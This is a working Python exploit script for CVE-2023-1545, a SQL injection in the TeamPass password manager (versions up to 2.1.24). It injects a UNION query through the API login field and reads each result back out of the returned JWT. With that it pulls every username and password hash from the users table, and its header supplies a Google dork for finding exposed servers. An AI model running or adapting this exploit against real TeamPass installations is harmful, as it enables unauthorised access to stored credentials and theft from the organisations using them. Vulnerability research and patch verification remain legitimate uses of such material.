# Exploit Title: TeamPass SQL Injection
# Google Dork: intitle:"Teampass" + inurl:index.php?page=items
# Date: 02/23/2025
# Exploit Author: Max Meyer - Rivendell
# Vendor Homepage: http://www.teampass.net
# Software Link: https://github.com/nilsteampassnet/TeamPass
# Version: 2.1.24 and prior
# Tested on: Windows/Linux
# CVE : CVE-2023-1545
#!/usr/bin/env python3
import sys
import json
import base64
import logging
import requests
from typing import Optional, Dict, Any
from dataclasses import dataclass
# Configuração de logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
@dataclass
class TeamPassExploit:
base_url: str
arbitrary_hash: str = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'
def __post_init__(self):
self.vulnerable_url = f"{self.base_url}/api/index.php/authorize"
def check_api_enabled(self) -> bool:
"""Verifica se a API está habilitada."""
try:
response = requests.get(self.vulnerable_url)
if "API usage is not allowed" in response.text:
logger.error("API feature is not enabled")
return False
return True
except requests.RequestException as e:
logger.error(f"Erro ao verificar API: {e}")
return False
def execute_sql(self, sql_query: str) -> Optional[str]:
"""Executa uma query SQL através da vulnerabilidade."""
try:
inject = f"none' UNION SELECT id, '{self.arbitrary_hash}', ({sql_query}), private_key, " \
"personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' " \
"FROM teampass_users WHERE login='admin"
data = {
"login": inject,
"password": "h4ck3d",
"apikey": "foo"
}
response = requests.post(
self.vulnerable_url,
headers={"Content-Type": "application/json"},
json=data
)
if not response.ok:
logger.error(f"Erro na requisição: {response.status_code}")
return None
token = response.json().get('token')
if not token:
logger.error("Token não encontrado na resposta")
return None
# Decodifica o token JWT
token_parts = token.split('.')
if len(token_parts) < 2:
logger.error("Token JWT inválido")
return None
payload = base64.b64decode(token_parts[1] + '=' * (-len(token_parts[1]) % 4))
return json.loads(payload).get('public_key')
except Exception as e:
logger.error(f"Erro ao executar SQL: {e}")
return None
def get_user_credentials(self) -> Optional[Dict[str, str]]:
"""Obtém credenciais de todos os usuários."""
try:
# Obtém número total de usuários
user_count = self.execute_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
if not user_count or not user_count.isdigit():
logger.error("Não foi possível obter o número de usuários")
return None
user_count = int(user_count)
logger.info(f"Encontrados {user_count} usuários no sistema")
credentials = {}
for i in range(user_count):
username = self.execute_sql(
f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
)
password = self.execute_sql(
f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
)
if username and password:
credentials[username] = password
logger.info(f"Credenciais obtidas para: {username}")
return credentials
except Exception as e:
logger.error(f"Erro ao obter credenciais: {e}")
return None
def main():
if len(sys.argv) < 2:
logger.error("Usage: python3 script.py <base-url>")
sys.exit(1)
exploit = TeamPassExploit(sys.argv[1])
if not exploit.check_api_enabled():
sys.exit(1)
credentials = exploit.get_user_credentials()
if credentials:
print("\nCredenciais encontradas:")
for username, password in credentials.items():
print(f"{username}: {password}")
if __name__ == "__main__":
main()
